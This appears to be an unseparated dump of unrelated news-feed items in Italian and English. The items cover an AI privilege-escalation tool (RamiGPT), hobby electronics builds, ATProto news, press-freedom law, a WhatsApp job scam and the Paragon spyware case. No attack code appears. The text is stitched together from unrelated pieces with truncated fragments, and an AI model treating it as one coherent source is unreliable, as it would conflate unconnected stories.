Uno sviluppatore che usa lo pseudonimo M507 ha presentato un nuovo progetto open source, RamiGPT, uno strumento basato sull’intelligenza artificiale che aiuta ad automatizzare le attività di analisi dei privilegi e di scansione delle vulnerabilità. Il progetto si basa su una connessione tra OpenAI e script Linux e Windows come LinPEAS e BeRoot. Lo strumento è progettato per i ricercatori di sicurezza informatica e i pentester che hanno bisogno di individuare in modo rapido ed efficiente potenziali vettori di escalation dei privilegi in un sistema di destinazione.
Per lavorare con RamiGPT è necessaria una chiave API OpenAI, che può essere ottenuta dal sito web di OpenAI dopo la registrazione. Dopodiché, copia semplicemente il file di impostazioni .env.example in .env , aggiungi la tua chiave alla riga appropriata e potrai avviare il sistema. Sono disponibili due scenari di avvio: tramite Docker e in un ambiente locale. Nel primo caso, è necessario installare Docker e Docker Compose, clonare il repository, eseguire i contenitori e aprire l’interfaccia web all’indirizzo 127.0.0.1:5000. Il secondo richiede Python 3, pip e i comandi eseguiti per generare certificati e installare le dipendenze.
RamiGPT è in grado non solo di analizzare i risultati di strumenti esterni, ma anche di consigliare automaticamente l’avvio di uno script specifico a seconda del sistema operativo. Ad esempio, su Windows – BeRoot, su Linux – LinPEAS. È anche possibile importare ed esportare istruzioni, ad esempio per attività di capture the flag. Tutto ciò è accompagnato da animazioni gif dimostrative che mostrano chiaramente come l’intelligenza artificiale identifica le vulnerabilità e suggerisce modi per sfruttarle.
Il progetto viene distribuito con la precisazione che è destinato esclusivamente a un uso legale, ovvero a fini didattici o per testare sistemi per i quali l’utente ha un’autorizzazione ufficiale. L’autore sottolinea: qualsiasi utilizzo al di fuori di questi limiti è inaccettabile.
You take your air quality seriously, so shouldn’t your monitoring hardware? If you’re breathing in nasty VOCs or dust, surely a little blinking LED isn’t enough to express your displeasure with the current situation. Luckily, [Tobias Stanzel] has created the AqMood to provide us with some much-needed anthropomorphic environmental data collection.
To be fair, the AqMood still does have its fair share of LEDs. In fact, one might even say it has several device’s worth of them — the thirteen addressable LEDs that are run along the inside of the 3D printed diffuser will definitely get your attention. They’re sectioned off in such a way that each segment of the diffuser can indicate a different condition for detected levels of particulates, VOCs, and CO2.
But what really makes this project stand out is the 1.8 inch LCD mounted under the LEDs. This display is used to show various emojis that correspond with the current conditions. Hopefully you’ll see a trio of smiley faces, but if you notice a bit of side-eye, it might be time to crack a window. If you’d like a bit more granular data its possible to switch this display over to a slightly more scientific mode of operation with bar graphs and exact figures…but where’s the fun in that?
[Tobias] has not only shared all the files that are necessary to build your own AqMood, he’s done a fantastic job of documenting each step of the build process. There’s even screenshots to help guide you along when it’s time to flash the firmware to the XIAO Seeed ESP32-S3 at the heart of the AqMood.
Toaster oven reflow projects are such a done deal that there should be nothing new in one here in 2025. Take a toaster oven, an Arduino, and a thermocouple, and bake those boards! But [Paul J R] has found a new take on an old project, and better still, he’s found the most diminutive of toaster ovens from the Australian version of Kmart. We love the project for the tiny oven alone.
The brains of the operation is an ESP32, in the form of either a TTGO TTDisplay board or an S3-Zero board on a custom carrier PCB, with a thermistor rather than a thermocouple for the temperature sensing, and a solid state relay to control mains power for the heater. All the resources are in a GitHub repository, but you may have to make do with a more conventionally-sized table top toaster oven if you’re not an Aussie.
Plastic has been a revolutionary material over the past century, with an uncountable number of uses and an incredibly low price to boot. Unfortunately, this low cost has led to its use in many places where other materials might be better suited, and when this huge amount of material breaks down in the environment it can be incredibly persistent and harmful. This has led to many attempts to recycle it, and one of the more promising efforts recently came out of a lab at Northwestern University.
Plastics exist as polymers, long chains of monomers that have been joined together chemically. The holy grail of plastic recycling would be to convert the polymers back to monomers and then use them to re-make the plastics from scratch. This method uses a catalyst to break down polyethylene terephthalate (PET), one of the more common plastics. Once broken down, the PET is exposed to moist air which converts it into its constituent monomers which can then be used to make more PET for other uses.
Of course, the other thing that any “holy grail” of plastic recycling needs is to actually be cheaper and easier than making new plastic from crude oil, and since this method is still confined to the lab it remains to be seen if it will one day achieve this milestone as well. In the meantime, PET can also be recycled fairly easily by anyone who happens to have a 3D printer around.
The ATmosphereConf was last weekend, independent relays are starting to appear, and more.
Conference
This weekend was the first ATProto conference, the ATmosphereConf, in Seattle. Over two days there were a large number of speakers and sessions, with over 150 people in attendance, and a significant number watching the live streams as well. I could not make it to the US, so for a full overview of the event, I recommend this extensive article by TechCrunch’ Sarah Perez, who was present at the event. The entire event was livestreamed, and all talks can be viewed via this YouTube playlist.
Some assortment of thoughts I had while watching the livestream and VODs over the last few days:
Bluesky CEO Jay Graber gave a short speech, about her background as a digital rights activist, and how she is now “holding the door open, so people can see another world is possible”. Graber is clearly aware of her position, where she is seen as a figurehead of the network, while also wanting to build a decentralised network where there is place for competing platforms. Being a figurehead of a network, without becoming the de facto leader of the network, while also holding the leadership position of by far the largest organisation in the network, is a challenging position to balance.
Bluesky CTO Paul Frazee talked about where Bluesky came from and where it is going. One of the things he talked about is the consideration of why Bluesky decided on their own protocol and not ActivityPub. His answer focuses on practical considerations, especially how ActivityPub handles identity and account migration. Watching the ATProto Ethos talk by Bluesky protocol engineer Daniel Holmgren it struck me that the question could also be framed as a matter of lineage. Holmgren talks about how ATProto takes inspiration from the Web, Peer to Peer systems as well as Distributed Systems. Placing it in such a context makes it clear that ATProto has quite a different background and other ways of thinking than ActivityPub has.
Ændra Rhinisland talked about how community projects can become load-bearing for the network, without adequate support structures for the people who run such projects. She also runs the popular news feeds using Graze. Graze has been adding support for advertisements, and Ændra is one of the first to take advantage. In her talk she walked through how at current usage rates, the feeds could generate over $20k per month in ad revenue. She plans to use this revenue to support the queer communities building on ATProto, and showed early plans for a self-sustaining fund powered by Graze’s feed revenue, to support initiatives such as Northsky.
The talk by Ms Boba is a great indication of how much under-explored design space there is on Bluesky and ATProto. Her talk focuses on labelers and fandom communities, and has some great examples of how they can be used outside of moderation.
Blacksky founder Rudy Fraser gave an excellent talk, describing Bluesky as a skeuomorphism, meaning that it imitates the design of the product it’s replacing. This phase is a part of the adoption cycle for new technologies, but Fraser does not to stop at imitation but instead explore the new ways that communities can be build online. Fraser is specifically interested in building platforms that can serve mid-sized communities, ranging from hundreds of thousands to a few million people. The Blacksky community is an example of this, and Fraser hopes that Blacksky can inspire other communities to do the same. His framing of content moderation as community care and not a cost of business also resonated with me.
Erin Kissane’s talk goes into detail about vernacular institutions, local and grassroots organisations and practices that are often illegible to outsiders but deeply embedded in local communities. This allows them to be close to the needs of their community members, but makes them hard to see and understand from the outside. This outside illegibility is a double-edged sword: IFTAS served a crucial role for trust and safety in the fediverse ecosystem, but had to shut down to a lack of funding as a result of being illegible to financiers.
Bluesky PBC has been working on a new version of the relay that makes it easier and cheaper to host, under the Sync 1.1 proposal. This new version is now starting to roll out, showing a significant drop in resource usage. Bluesky engineer Bryan Newbold shared some statistics here. Independent ATProto developer @futur.blue set up his own relay as a speedrun. He shows that a full network relay can be run on a 50USD Raspberry Pi, with an easy-to-follow tutorial here.
That full network ATProto relays are cheap to run has been known for a while within the ATProto developer community, but that knowledge has not spread much yet. One reason for this is that independent developers have set up relays primarily for their own use, sharing access with a few friends, but no other publicly accessible full-network relays exist yet1.
Upcoming short-form video platform Spark is building their own complete infrastructure. Spark’s relay will publicly accessible, and hosted in Brazil. Having ATProto infrastructure outside of US jurisdiction is a conversation that has come up regularly, and often followed by the assumption that the alternative is to have infrastructure like a relay hosted in Europe. Spark is bringing in a slightly unexpected twist here, by having the first publicly accessible relay that is not owned by Bluesky PBC being hosted in Brazil instead.
Having other relays that are not owned by Bluesky PBC has been the subject of a lot of conversation, and the Free Our Feeds campaign was founded on the idea that a significant financial investment is needed to do so. Furthermore, it assumes that such a relay is not only expensive, but that it requires an extensive governance infrastructure to manage it. The current developments regarding relays call both of these assumptions into serious question: relays are cheap, not expensive. Furthermore it seems that there is enough incentive that organisations that are serious about building their own ATProto platforms are willing to run their own relays.
In Other News
Bluesky PBC has published a proposal on how they want to handle OAuth Scopes. OAuth Scopes is one of the main projects on the roadmap for the first half of this year. Currently, logging into an ATProto app via OAuth requires you to give that app permission to access all the data for your account. OAuth Scopes allows an app to only ask for the permissions that are necessary, and not the entire account. There are two problems that need to solve: the technical part of making it work, as well as the handling the UX to communicate clearly to people what data an app wants to access. The challenging part of the UX is how to handle the translation from the technical description of the data that is requested (stylised like ‘app.bsky.feed.getFeed’, for example), into a way that is understandable for the everyday user. The second challenge is that apps require permission not for one, but for many types of this lexicon data. A third-party Bluesky client that is restricted to only Bluesky data will still have to request a dozen of these Lexicons. A long list of technical lexicon names makes it impossible for regular people to have an informed opinion on what data is and is not being accessed. Bluesky PBC’s proposal is to group different lexicons into bundles, and create new lexicons that reference these bundles. Scoped OAuth can then request access to a bundle of lexicons, with a description that is legible for regular people.
Git repository platform Tangled is working on news ideas how a GitHub alternative might do things differently, and one of their first proposals is defining two types of pull requests. For another look at Tangled, this blog post experiment with what the platform allows.
One of the talks at the ATmosphereConf was by independent developer Rashid Aziz, who is the co-founder of basic.tech. Basic is a protocol for user-owned data, and seems to be fairly comparable to the PDS part of ATProto, with the major difference that Basic allows for private data on their version of a PDS. Aziz used the combination of these two protocols to create private bookmarks for Bluesky.
The new Record Collector labeler automatically displays if someone has been using other apps in the ATmosphere outside of Bluesky.
Rocksky is a new music scrobbler service on ATProto, that is currently in closed beta testing. It allows people to connect their Spotify account and automatically ‘scrobble’ (track) the music they are listening to.
The Links
Some tech-focused links for ATProto:
ATCryptography is a package with cryptographic utilities for the ATProto, written in Swift.
A blog post by independent ATProto developer Mary about ‘AT Protocol, OAuth, and well, decentralization’. Mary also published a repository car file explorer this week.
That’s all for this week, thanks for reading! If you want more analysis, you can subscribe to my newsletter. Every week you get an update with all this week’s articles, as well as extra analysis not published anywhere else. You can subscribe below, and follow this blog @fediversereport.com and my personal account @laurenshof.online on Bluesky.
Cerulea.blue is a publicly accessible relay, using a custom implementation, but it is limited to non-Bluesky PDSes. ↩︎
Chicago journalist Jim DeRogatis is no criminal, but in 2008 he invoked the Fifth Amendment to avoid testifying at music superstar R. Kelly’s trial. It’s a strategy that more journalists unfortunately may need to consider.
Years earlier, someone sent an unmarked VHS tape depicting Kelly abusing a young girl to DeRogatis. His reporting led to Kelly’s indictment and trial. (The musician was acquitted but is currently in prison for related convictions over a decade later.)
Subpoenaed to testify, DeRogatis, then with the Chicago Sun-Times, invoked Illinois’ reporter’s privilege law. Judge Vincent Gaughan ordered him to take the stand anyway.
But hislawyers (I was a clerk at the firm representing him) realized DeRogatis had potentially, albeit involuntarily, possessed a video containing child sexual abuse material, or CSAM. That is, of course, illegal. Gaughan had no choice but to acknowledge that the prospect that DeRogatis could be prosecuted, however remote, entitled him to invoke his Fifth Amendment protection against self-incrimination.
At the time, DeRogatis’ strategy might’ve been a stretch in non-CSAM cases. Newsgathering is generally safeguarded by the First Amendment. Most journalists need not worry about prosecution.
But things have changed, even if the constitution hasn’t. Here’s a non-exhaustive list of some ways officials around the country have tried to criminalize routine newsgathering in recent years.
Prosecutors in Kansas claimed that using a government website violated state computer crime and identity theft laws.
Prosecutors in Alabama charged journalists for reporting on a grand jury proceeding.
A city attorney in San Francisco, California, accused a journalist of breaking the law by reporting on a tech executive’s sealed arrest report.
A state senator in Arizona got a restraining order against a journalist who knocked on her door.
A Tampa, Florida, fire chief called police on a journalist for asking for public records.
A Chicago suburb ticketed a reporter for calling government officials too often.
A Texas citizen journalist was arrested for asking police officers questions.
Another Texas citizen journalist was arrested for filming police in public.
The Los Angeles County Sheriff’s Department pushed for prosecuting a journalist who reported on a leaked list of problem deputies.
Missouri’s governor sought to prosecute a journalist who alerted the state of a security vulnerability on its website.
A California city sued a blog under computer crime laws for accessing a publicly available Dropbox.
An Ohio journalist was charged for publishing a source’s recording of a court proceeding.
Two North Carolina journalists were arrested for reporting on police operations after a park curfew.
The federal government argued that publishers could be charged with possessing and transporting stolen property for acquiring documents a source stole.
The Biden administration extracted a guilty plea from WikiLeaks founder Julian Assange under the Espionage Act for obtaining and publishing government documents from a source.
It also prosecuted journalist Tim Burke under computer fraud and wiretapping laws for downloading publicly available materials on the internet. The case remains pending.
The current interim U.S. attorney for the District of Columbia, Ed Martin, has suggested he believes naming federal employees or impeding government work to be illegal.
President Donald Trump said in a nationally televised address that he thinks reporting he views as biased against him is against the law.
Masked federal agents abducted a graduate student from Tufts University in Massachusetts, and the government revoked her student visa. Her friends think it’s because she cowrote a pro-Palestine op-ed.
If officials keep telling us they see journalism as criminal, journalists should believe them and exercise their rights accordingly. It’ll understandably leave a bad taste in journalists’ mouths to plead the Fifth, but doing so isn’t an admission that you’re guilty — only that the government might think so.
If nothing else, it’ll make quite a statement about the state of press freedom for journalists to have to plead the Fifth like criminals. And in light of the cases listed above, there are hardly any circumstances under which a journalist asked to testify about sources or newsgathering methods doesn’t have a legitimate concern about self-incrimination.
Published documents from the internet against someone’s wishes? Met a confidential source in the park after dark? Obtained names of government workers? Possessed and transported source documents? Your fear of being prosecuted may be every bit as legitimate as DeRogatis’, and arguably more so, since you can point to examples, not just hypotheticals.
If officials keep telling us they see journalism as criminal, journalists should believe them and exercise their rights accordingly.
This approach isn’t foolproof, particularly when journalists are subpoenaed by the government. Prosecutors can offer journalists immunity, mooting self-incrimination concerns. That’s what the Obama administration did when it wanted then-New York Times journalist James Risen to testify.
But prosecutors don’t always offer immunity, which may require approval from higher-ups and create administrative headaches. And in Trump’s made-for-TV administration, the optics of granting immunity to “enemies of the people” may be so unappealing that they’d rather forgo the testimony.
Plus, many subpoenas to journalists aren’t issued by the government. Some are issued by defense lawyers, others by private litigants in civil lawsuits. The government is unlikely to offer immunity under these circumstances. And agencies like U.S. Immigration and Customs Enforcement, known to issue its own administrative subpoenas to journalists, don’t have the authority to grant immunity on their own.
Even before the recent wave of anti-press criminal theories, journalists like the Detroit Free Press’ David Ashenfelter were able to successfully plead the Fifth in non-CSAM cases. He was subpoenaed in a federal Privacy Act lawsuit over his reporting on a terrorism investigation. After the court declined to apply the reporter’s privilege, he invoked his right against self-incrimination because he could, conceivably, be prosecuted for receiving confidential Justice Department materials.
And almost 20 years ago, Peter Scheer wrote that journalists should consider the Fifth in light of then-Attorney General Alberto Gonzales’ comments in an ABC News interview that journalists could be prosecuted for publishing government secrets.
That prospect is far more realistic now, after the Assange plea deal. We’re no longer talking about TV interviews, but an actual conviction.
I’m not your attorney. I’m not telling you what to do or how. Every case is different. But if you’re subpoenaed and a judge rejects the reporter’s privilege, consider asking your lawyer if the Fifth is an option.
It’s a shame that journalists need to even think about this kind of thing, but protecting sources is paramount, now more than ever.
Fake WiFi repeater with a cheap real one behind it. (Credit: Big Clive, YouTube) Over the years we have seen a lot of fake electronics, ranging from fake power saving devices that you plug into an outlet, to fake car ECU optimizers that you stick into the OBD port. These are all similar in that they fake functionality while happily lighting up a LED or two to indicate that they’re doing ‘something’. Less expected here was that we’d be seeing fake WiFi repeaters, but recently [Big Clive] got his hands on one and undertook the arduous task of reverse-engineering it.
The simple cardboard box which it comes in claims that it’s a 2.4 GHz unit that operates at 300 Mbps, which would be quite expected for the price. [Clive] obtained a real working WiFi repeater previously that did boast similar specifications and did indeed work. The dead giveaway that it is a fake are the clearly fake antennae, along with the fact that once you plug it in, no new WiFi network pops up or anything else.
Inside the case – which looks very similar to the genuine repeater – there is just a small PCB attached to the USB connector. On the PCB are a 20 Ohm resistor and a blue LED, which means that the LED is being completely overdriven as well and is likely to die quite rapidly. Considering that a WiFi repeater is supposed to require a setup procedure, it’s possible that these fake repeaters target an audience which does not quite understand what these devices are supposed to do, but they can also catch more informed buyers unaware who thought they were buying some of the cheap real ones. Caveat emptor, indeed.
We don’t often get our badminton rackets restrung, but if we did, [kuokuo702]’s PicoBETH project would be where we’d turn. This is a neat machine build for a very niche application, but it’s also a nicely elaborated project with motors, load cells, and even a sweet knobby-patterned faceplate that is certainly worth a look even if you’re not doing your own restringing.
We’ll admit that everything we know about restringing rackets we learned by watching [kuokuo]’s demo video, but the basic procedure goes like this: you zigzag the string through the holes in the racket, controlling the tension at each stage along the way. A professional racket frame and clamp hold the tension constant while you fiddle the string through the next hole, but getting the tension just right in the first place is the job of [kuokuo]’s machine. It does this with a load cell, stepper motor, and ball screw, all under microcontroller control. Pull the string through, let the machine tension it, clamp it down, and then move on to the next row.
Automating the tension head allows [kuokuo] to do some fancy tricks, like pre-stretching the strings and even logging the tension in the string at each step along the way. The firmware has an extensive self-calibration procedure, and in all seems to be very professional. But it’s not simply functional; it also has a fun LEGO-compatible collection of bumps integrated into the 3D-printed dust cover. That way, your minifigs can watch you at work? Why not!
Automating random chores is a great excuse to build fun little machines, and in that vein, we salute [kuokuo]’s endeavor. Once you start, you’ll find stepper motors sprouting all around like crocuses in a spring field. And speaking of spring, Easter is just around the corner. So if you don’t play badminton, maybe it’s time to build yourself an eggbot.
Lucrezia Ercoli è docente di “Storia dello spettacolo” all’Accademia di Belle Arti di Bologna. Dal 2011, ricopre il ruolo di direttrice artistica di “Popsophia”. Ha collaborato con il programma televisivo “Terza Pagina” su Rai5 e Rai3 ed è una presenza fissa nel programma “Touch.
@Informatica (Italy e non Italy 😁) Secondo un'indagine di Trend Micro, un miliardo di aziende nel mondo non la usa, anche se l'Europa è un'area virtuosa. Ecco quali rischi corre chi non adotta l'autenticazione a due fattori L'articolo Autenticazione a due fattori: la sicurezza digitale è
facendo immersioni sub ti rendi subito conto che il tuo assetto (tendenza a risalire o scendere, più o meno marcato) è pesantemente condizionato dai pomoni e da quanta aria usi per riempirli, mente respiri. non a caso prendere una bella boccata d'aria e cominciare la discesa è "contro-efficace". un sub svuota bene i polmoni mente si dà la spinta verso il basso, prima di cominciare a scendere, specie nei primi metri di discesa, quelli più difficili per definizione.
poi scopri che i primi rudimentali polmoni sono l'evoluzione sentite bene.... non delle branchie... ma della vescica natatoria. sapete a cosa serve la vescica natatoria vero? ignorerò chi non lo sa. quindi beh... alla fine tutto torna fin troppo magnificamente alla grande.
The Speaker Wars è la nuova band dell’ex Heartbreakers Stan Lynch freezonemagazine.com/news/the-… Membro fondatore degli Heartbreakers di Tom Petty, Stan Lynch, il batterista del gruppo, ha ora una nuova band, The Speaker Wars, composta da Stan Lynch – Batteria, Jon Christopher Davis – Voce, Jay Michael Smith – Chitarra, Brian Patterson – Basso, Steve Ritter – Percussioni e Jay Brown – Tastiera. Stan ha dichiarato: “Dopo 20
Anche se scopi e obiettivi ufficiali dei nuovi dazi, annunciati questa settimana sulle auto di importazione, non corrispondono alle conseguenze che avranno realmente nel breve e medio periodo, il presidente americano Trump ha deciso di procedere con …
Il ministro della Difesa, Guido Crosetto, ha ribadito oggi in Parlamento che l’Italia non sta perseguendo una politica di riarmo, ma sta lavorando per costruire una difesa adeguata alle sfide globali. In un intervento alle commissioni Esteri e Difesa di Camera e
@Informatica (Italy e non Italy 😁) Poche, ancora, le aziende italiane con una strategia di cybersecurity matura: appena il 15%. È quanto si evince dal secondo rapporto Cyber Index PMI. Un'analisi completa rivela le debolezze delle piccole e medie imprese nella gestione dei rischi digitali, tra minacce crescenti
Come era prevedibile la presentazione del Libro Bianco sulla Difesa Europea, al pari del precedente ReArm Europe, ha rinfocolato in Italia polemiche, furore populista e divisioni su un tema vitale per il futuro della
Ah, the CAN bus. It’s become a communication standard in the automotive world, found in a huge swathe of cars built from the mid-1990s onwards. You’ll also find it in aircraft, ships, and the vast majority of modern tractors and associated farm machines, too.
As far as [Randy Glenn] is concerned, though, the CAN bus doesn’t have to be limited to these contexts. It can be useful far beyond its traditional applications with just about any hardware platform you care to use! He came down to tell us all about it at the 2024 Hackaday Supercon.
[Randy]’s talk was titled “Yes, You CAN: Use The Controller Area Network Outside Of Cars.” We have to assume the pun was intended. In any case, the CAN bus came to us from Bosch, which began developing the standard in 1983. The company officially released it at the Society of Automotive Engineers conference in 1986, with compatible chips first hitting the market a year later. It took a little while longer for the standard to find traction, with Mercedes-Benz being the first to implement it in a production vehicle in 1991. It soon caught on with the wider industry as a robust and reliable way to let a vehicle’s various control units communicate with all the important sensors that were proliferating on modern automobiles. CAN got its big break when it was mandated as part of the OBD-II standard in North America, which defacto put it into virtually every car sold in that market from 1996 onwards.
Since then, CAN has proliferated well beyond the automotive space, into marine and aerospace contexts as well. As [Randy] explains, beyond transportation, you’ll also find it in everything from robots to pinball machines and even elevators. Basically, wherever it’s important to have robust local communication between distributed embedded systems, CAN is a great candidate for the job.
Since it’s so widespread, it’s easy to find hardware and software that’s CAN-ready out of the box. The vast majority of microcontroller manufacturers include some sort of CAN compatibility; for example, Espressif’s ESP32 has the “Two Wire Automotive Interface” which is built for this purpose. Linux is more than happy to talk CAN, too, and most programming languages have some sort of library available, too. Whether you’re working with Arduino, MicroPython, or CircuitPython, you can certainly find what you need. Even if you have a device without CAN built in—like a Raspberry Pi—SPI-ready CAN controllers can be had for cheap from vendors like Microchip. Depending on your hardware, you might have to add a CAN controller or transceiver to get it talking on the CAN bus. However, this is usually trivial. There are specific reasons why you might consider CAN for your embedded communication needs. It uses a differential bus, which gives it an inherent ability to resist disruption from electrical noise. Addressing, error-checking, and retransmission functionality are also baked in to CAN controllers, so you don’t have to handle it yourself. You can also find tons of CAN compatible hardware on the market to do whatever you’re trying to do, and a lot of it is pretty cheap because manufacturers are churning it out by the millions.
Of course, there are some limits. Traditionally, you’re stuck with only 32 devices on a bus, though there are some ways to work around it at lower data rates. Peak data rate is 1 megabit per second on a traditional CAN bus operating at the high data rate; this limits you to a total bus length of 25 meters. You can up this to 250 meters if you drop to 250 kbit/s instead. Packets are also limited to 8 bytes in size.
Beyond the basic performance specs, [Randy] also explains how you might go about typical implementations with different hardware. For example, if you’ve got a microcontroller with no CAN capability baked in, you might hook it up with a CAN controller and transceiver over SPI. Alternatively, you might choose to work with a more advanced microcontroller that has all the CAN communication hardware built into the chip, simplifying your build. For parts like the ESP32 and some STM32s, you might find you’ve got a CAN controller on board, but you’re lacking the hardware to do the fancy differential signalling—in that case, you just need to hook up a CAN transceiver to get your hardware on the bus. [Randy] also highlights the usual conventions, such as terminology and wire colors, while explaining that these aren’t always rigidly adhered to in the field. Talking CAN on Linux is as easy as plugging in a cheap USB dongle. On the communication level, the CAN bus standard mandates that nodes transmit frames, with each each frame containing up to 8 bytes of data. [Randy] explains how messages are formatted and addressed to ensure the right nodes get the right data they’re looking for. There are standard message frames, as well as Remote Transmission Request (RTR) frames—where one node requests data from another. A typical example is a controller asking a sensor to report a value. There are also special Error and Control Frames, which [Randy] notes are complicated and beyond the scope of his Supercon talk. However, he recommends resources that exist to explain them in great detail. Data of a complete CAN frame laid over the traces of the bus itself. Credit: Ken Tindell, Canis Automotive Labs Ltd. via CC BY-SA 4.0 Much of [Randy’s] talk explains how CAN works. But, as promised, he also takes the time to explain possible non-automotive applications for this technology. He steps through an amusing Halloween build, where a CAN bus is used to trigger scary lightning and sound effects when people press a doorbell.
If you’ve ever wanted a good CAN primer, [Randy]’s talk is just what you need. As far as robust embedded communication standards go, it’s one of the most popular and long-lived out there. It might just pay dividends to put the CAN bus in your own toolbox for future use!
questo spiega come mai le parole che non ti vengono mia in mente non c'è verso di insistere e facilitare il recupero, se non trovare un modo di ri-memorizzarla seguendo un percorso "più solido". per esempio per me la parola "ingenuo" è davvero difficile da recuperare quando mi serve.
Una telefonata da un numero italiano. Una voce registrata che informa circa la ricezione del curriculm vitae e invita a salvare il numero e scrivere su WhatsApp per parlare di un’offerta di lavoro. Si tratta di una truffa che ha un duplice obiettivo: acquisire fraudolentemente i dati personali della vittima, convinta di partecipare ad un processo di selezione, e farla investire successivamente all’interno di una piattaforma di exchange. In alcune varianti di questa truffa, c’è l’invito riguarda l’acquisto di corsi o certificazioni “abilitanti” per il lavoro che si andrà a svolgere o per avere un vantaggio nella selezione.
In ogni caso, è evidente che il bottino dei cybercriminali consista in dati personali e pagamenti, mentre la leva impiegata è quella del desiderio, la cui efficacia aumenta in modo significativo nelle ipotesi in cui il destinatario sta cercando attivamente lavoro ed è poco consapevole di questi schemi di truffa.
L’attacco: un invito “irresistibile”
L’esca è proprio quell’invito “irresistibile” che non viene presentato con l’enfasi di una vittoria insperata o la promozione di un’occasione irripetibile. Veste invece la maschera dell’ordinarietà, contando sul fatto che l’inconsapevole vittima abbia “fatto girare” il proprio CV e si attenda (prima o poi) un qualche tipo di riscontro a riguardo. Insomma: nulla che faccia pensare di essere i vincitori del Golden Ticket di Willy Wonka, altrimenti la reazione sarebbe la diffidenza. Meglio l’ordinarietà. Un messaggio preregistrato, semplice, essenziale.
Che però solletica il desiderio di contattare il numero, alimentato ancor più dalla speranza di poter finalmente trovare un lavoro. Questo ultimo elemento deve far riflettere sulla scelta vettore impiegato, ovverosia la telefonata. Comporta una diminuzione della soglia di attenzione, dà un senso di attendibilità.
Abbiamo ricevuto il tuo curriculum. Salva questo contatto e scrivimi su WhatsApp per maggiori informazioni
Tutti ingredienti attentamente dosati per il buon esito della truffa.
Attenzione, però: per quanto le chiamate di questo tipo siano state diffusamente segnalate negli ultimi tempi, ciò non toglie che vengano impiegati anche SMS o messaggi tramite social network. Soprattutto all’interno dei social i messaggi vengono diretti nei confronti dei membri di gruppi o follower di pagine in cui vengono pubblicate offerte di lavoro.
Il perché è semplice: sono cluster ancor più specifici di potenziali vittime, dal momento che hanno in comune una ricerca attiva di lavoro e dunque la leva del desiderio può rivelarsi una scommessa ancor più efficace.
L’invito è attentamente ingegnerizzato per essere, di fatto, quanto più “irresistibile” possibile.
La difesa: consapevolezza e buone pratiche di cyber hygiene
Come è possibile difendersi? Riconoscere questi schemi di truffa è particolarmente importante, dal momento che dai tempi della nota truffa del principe nigeriano i comuni denominatori sono e rimangono inevitabilmente sempre gli stessi. Tutti elementi che possono far scattare cautele ulteriori, come vere e proprie red flag.
Ancor meglio, però, è che alcune cautele quali buone pratiche di cyber hygiene siano adottate a prescindere da un’allerta, come ricordato dalla Polizia Postale e delle comunicazioni. La consapevolezza che i propri dati personali hanno un valore e dunque sono appetibili per i cybercriminali è già un motivo sufficiente per adottare comportamenti sicuri, proteggendo i propri dispositivi, avendo cura di non aprire link o allegati non verificati, né tantomeno comunicare alcune informazione con troppa leggerezza.
Insomma: si deve sempre pensare al peggiore impiego che qualcuno possa fare delle proprie informazioni.
Perché, siatene certi, nessun cybercriminale avrà remore a tale riguardo.
@Politica interna, europea e internazionale Il Governo Meloni sale nella classifica degli esecutivi più longevi della storia della Repubblica italiana. Oggi, giovedì 27 marzo 2025, è diventato il quinto governo rimasto in carica più lungo: insediatosi il 22 ottobre 2022, ha infatti toccato gli 887
In the era of digital streaming, the market is full of wireless speakers that will play content from your smartphone or pull it down from the Internet directly over WiFi. But if you’re feeling a bit nostalgic and want to throw on one of your old CDs, well, you might have a problem. That’s the situation [Chad Boughton] recently found himself in, so he decided to build a compact CD player that could discreetly connect up to his fancy Klipsch speaker.
The optical drive itself was the easy part, as [Chad] already had a laptop-style drive in an external enclosure that he could liberate. But of course, the speaker wouldn’t know what to do with an external disc drive, so there needed to be an intermediary. Enter the Raspberry Pi.
It might not look like it at first glance, but that’s a Pi 3 tucked into the back of the 3D printed frame. It would have been too tall in its original configuration, so [Chad] removed the USB and Ethernet ports; a modification we’ve covered in the past. Of course, he still needed to use the USB ports, so he ended up soldering the two cables — one to the CD drive and the other to the back of the speaker — directly to the Pi.
When plugged into the Raspberry Pi, the Klipsch speaker shows up as a USB audio device, so the software side of things was relatively simple. [Chad] installed VLC to handle CD playback, but he still needed a way to control everything. To that end, a IR receiver hooked up to the Pi’s GPIO pins means the Pi can detect the signals coming from the speaker’s original remote and pass the appropriate command on to VLC. The whole thing is very well integrated, and you could be forgiven for thinking it might be some kind of stock upgrade module at first glance.
Hai mai usato il tuo router personale per connetterti a Internet? @Free Software Foundation Europe ha recentemente ottenuto una grande vittoria in Germania per Router Freedom. In questo 32 ° episodio del Software Freedom Podcast, Bonnie Mehring, Alexander Sander e Lucas Lasota parlano di Router Freedom e del nostro lavoro per proteggere la libertà di scelta dei dispositivi Internet.
Have you ever used your personal router to connect to the internet? Recently we achieved a major win in Germany for Router Freedom. In this 32nd episode of...
In relazione al caso Paragon, il governo italiano dopo aver respinto le accuse, ha modificato la sua versione dei fatti di fronte alla crescente pressione dei partiti di opposizione e degli attivisti.
Ora, un punto di svolta: il sottosegretario Alfredo Mantovano avrebbe ammesso che i servizi segreti italiani hanno autorizzato la sorveglianza tramite spyware sui membri della ONG Mediterranea Saving Humans. Tuttavia, rimane un mistero cruciale: chi c’era dietro la sorveglianza del direttore di Fanpage.it Francesco Cancellato?
La Commissione parlamentare di controllo dell’intelligence (Copasir) sta indagando per verificare se l’ uso dello spyware israeliano sia conforme alla legge italiana e se i servizi segreti abbiano agito nel rispetto del loro mandato autorizzando le intercettazioni preventive.
Mentre le udienze restano classificate, le fughe di notizie della seduta di martedì pubblicate da La Repubblica suggeriscono che Mantovano, che supervisiona le agenzie di intelligence, abbia riconosciuto che il governo aveva approvato la sorveglianza di alcuni attivisti. Tuttavia, ha sostenuto che Cancellato non è mai stato tra gli obiettivi.
Mantovano ha affermato che tutte le operazioni sono state condotte nel rispetto delle leggi che regolano le attività di intelligence, con l’approvazione sia del Governo che della Procura generale della Corte d’appello di Roma.
Ha giustificato la sorveglianza affermando che Mediterranea Saving Humans, che opera nel Mediterraneo per salvare i migranti, era stata classificata come un problema di sicurezza nazionale. Secondo il suo racconto, le agenzie di intelligence stavano conducendo un’“indagine preventiva sull’immigrazione illegale”.
